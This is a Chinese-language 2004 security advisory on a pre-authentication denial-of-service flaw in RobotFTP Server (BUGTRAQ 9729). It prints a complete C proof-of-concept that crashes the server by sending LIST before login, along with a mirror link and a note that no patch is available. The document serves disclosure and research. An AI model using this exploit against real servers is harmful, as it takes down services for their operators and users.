发布日期：2004-02-23
更新日期：2004-03-05

受影响系统：

RobotFTP RobotFTP Server 2.0 Beta 1
RobotFTP RobotFTP Server 2.0
RobotFTP RobotFTP Server 1.0

描述：

---

BUGTRAQ  ID: 9729

Robotftp是一款方便设置的FTP服务程序。

RobotFTP Server在处理部分命令时存在问题，远程攻击者可以利用这个漏洞进行拒绝服务攻击。

RobotFTP Server在处理验证协商之前的部分命令时存在漏洞，攻击者可以对FTP服务器进行攻击，停止对正常请求的响应。

<*来源：NoRpiUs （norpius@email.it）
  *>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

NoRpiUs （norpius@email.it）提供了如下测试方法：

/****************************************************************************
*                                                                          *
* Remote DoS                                                               *
* Mirror at: http://norpius.altervista.org/robo.zip                        *
* I have done this only for my birthday :) - Robo-SOFT don't be angry :)   *
*                                                                          *
***************************************************************************/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#ifdef WIN32
    #include <winsock.h>
    #include <windows.h>
    #define close closesocket
#else
    #include <sys/socket.h>
    #include <sys/types.h>
    #include <arpa/inet.h>
    #include <netdb.h>
#endif
#define DOSREQUEST "\x4C\x49\x53\x54\r\n"

void errore( char *err )
{
        printf("%s",err);
        exit(1);
}

void usage( char *progz )
{
        fputs("Robotftp FTP Server remote DoS\n"
              "By NoRpiUs\n"
              "Usage: <host> <port>\n", stdout);
        exit(1);
}

int main( int argc, char *argv[] )
{
        int sock;
        struct hostent *he;
        struct sockaddr_in target;
        char recvbuff[512];

#ifdef WIN32
    WSADATA wsadata;
    WSAStartup(0x1, &wsadata);
#endif

        if ( argc < 3 ) usage(argv[0]);

        if ( (he = gethostbyname(argv[1])) == NULL )
                errore("[-] Can't resolve host\n");

        target.sin_family = AF_INET;
        target.sin_addr   = *(( struct in_addr *) he -> h_addr );
        target.sin_port   = htons(atoi(argv[2]));

        fputs("[+] Connecting...\n", stdout);

        if ( (sock = socket( AF_INET, SOCK_STREAM, IPPROTO_TCP )) < 0)
                errore("[-] Can't create socket\n");

        if ( connect(sock, (struct sockaddr *) &target, sizeof(target)) < 0 )
                errore("[-] Can't connect\n");

        if ( recv( sock, recvbuff, sizeof(recvbuff), 0) < 0 )
                errore("[-] Server seems to be down\n");

        fputs("[+] Sending DoS request\n", stdout);

        if ( send( sock, DOSREQUEST, strlen(DOSREQUEST), 0) < 0 )
                errore("[-] Cant' send the request\n");

        fputs("[+] Done\n", stdout);

        close(sock);

        return(0);

}

建议：

---

厂商补丁：

RobotFTP
--------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.robotftp.com/

浏览次数：3090
严重程度：0（网友投票）